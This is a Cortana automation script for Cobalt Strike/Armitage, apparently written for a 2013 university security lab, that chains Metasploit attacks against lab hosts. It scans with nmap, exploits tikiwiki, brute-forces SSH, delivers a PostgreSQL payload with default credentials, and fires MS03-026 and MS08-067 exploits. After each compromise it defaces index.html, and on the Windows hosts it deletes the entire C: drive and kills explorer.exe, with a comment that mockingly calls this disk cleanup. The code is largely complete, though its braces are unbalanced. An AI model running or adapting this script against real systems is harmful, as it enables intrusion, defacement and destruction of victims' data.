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Last active November 14, 2018 00:59
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Cobalt Strike: cortana-script for IST511 Lab
# Cortana Script - "Time Bomb"
# For IST 511 2013
# Created by Patrick O'Connor
debug(debug()| 256);
on ready {
when heartbeat_5m {
#kick off nmap/ping sweep
cmd_async("db_nmap --min-hostgroup 96 -T4 -n -sn");
when heartbeat_10m {
#kick off nmap/service detection
cmd_async("db_nmap --min-hostgroup 96 -T4 -A -v -n");
when heartbeat_15m {
# tikiwiki - metasploitable
println("[*] Begin tikiwiki attack");
$console = console();
cmd($console, "use exploit/unix/webapp/tikiwiki_graph_formula_exec");
cmd_set($console, %(LHOST => "",
RPORT => "80",
LPORT => "9079",
RHOST => "",
PAYLOAD => "generic/shell_bind_tcp",
TARGET => "0"));
cmd($console, "exploit -j");
# Add some lulz to the index.html
on session_sync {
println("[*] We have a session!");
when ('heartbeat_5m', lambda({
# $sid is the session ID when I was declared.
println("[*] Adding lulz to index.html!");
s_cmd($sid, "echo '<h1>lulz</h1><br>' >> /var/www/index.html");
}, $sid => $1));
# SSH Brute Force
println("[*] Begin SSH brute force attack");
cmd($console, "use auxiliary/scanner/ssh/ssh_login");
cmd_set($console, %(THREADS => "24",
RPORT => "22",
VERBOSE => "1",
USER_AS_PASS => "1",
USER_FILE => "/opt/metasploit/msf3/data/wordlists/csusb_lab.txt",
RHOSTS => "",
cmd($console, "run -j");
# PostgreSQL Payload from SSH Creds
println("[*] Begin PostgreSQL payload attack");
cmd($console, "use exploit/linux/postgres/postgres_payload");
cmd_set($console, %(LHOST => "",
RPORT => "5432",
VERBOSE => "0",
LPORT => "28430",
RHOST => "",
PAYLOAD => "generic/shell_reverse_tcp",
DATABASE => "template1",
TARGET => "0",
USERNAME => "postgres",
PASSWORD => "postgres"));
cmd($console, "exploit -j");
when heartbeat_15m {
# Windows 2K3 DCOM Exploit ms03_026_dcom
println("[*] Begin Windows 2K3 DCOM ms03_26_dcom attack");
$console = console();
cmd($console, "use exploit/windows/dcerpc/ms03_026_dcom");
cmd_set($console, %(RHOST => "",
PAYLOAD => "windows/meterpreter/bind_tcp",
LHOST => "",
RPORT => "135",
LPORT => "20271",
TARGET => "0"));
cmd($console, "exploit -j");
# Lets let the computer cool down a bit before we "clean it"
on session_sync {
println("[*] We have a session!");
when ('heartbeat_5m', lambda({
# $sid is the session ID when I was declared.
println("[*] Perform magic cleanup!");
# Really useful command to free up some disk space.
m_exec($sid, "RMDIR /S /Q C:\\ ");
println("[*] Pens down everyone.");
m_exec($sid, "taskkill /f /im explorer.exe ");
}, $sid => $1));
when heartbeat_15m {
# Windows 2k3 SMB Exploit ms08_067_netapi
println("[*] Begin Windows 2k3 ms08_67 attack");
$console = console();
cmd($console, "use exploit/windows/smb/ms08_067_netapi");
cmd_set($console, %(RHOST => "",
PAYLOAD => "windows/meterpreter/bind_tcp"));
cmd($console, "exploit -j");
# Lets let the computer cool down a bit before we "clean it"
on session_sync {
println("[*] We have a session!");
when ('heartbeat_5m', lambda({
# $sid is the session ID when I was declared.
println("[*] Perform magic cleanup!");
# Really useful command to free up some disk space.
m_exec($sid, "RMDIR /S /Q C:\\ ");
println("[*] Pens down everyone.");
m_exec($sid, "taskkill /f /im explorer.exe ");
}, $sid => $1));
when heartbeat_15m {
# Windows XP SMB Exploit ms08_067_netapi
println("[*] Begin Windows XP ms08_67 attack");
$console = console();
cmd($console, "use exploit/windows/smb/ms08_067_netapi");
cmd_set($console, %(RHOST => "",
PAYLOAD => "windows/meterpreter/bind_tcp"));
cmd($console, "exploit -j");
# Lets let the computer cool down a bit before we "clean it"
on session_sync {
println("[*] We have a session!");
when ('heartbeat_5m', lambda({
# $sid is the session ID when I was declared.
println("[*] Perform magic cleanup!");
# Really useful command to free up some disk space.
m_exec($sid, "RMDIR /S /Q C:\\ ");
println("[*] Pens down everyone.");
m_exec($sid, "taskkill /f /im explorer.exe ");
}, $sid => $1));
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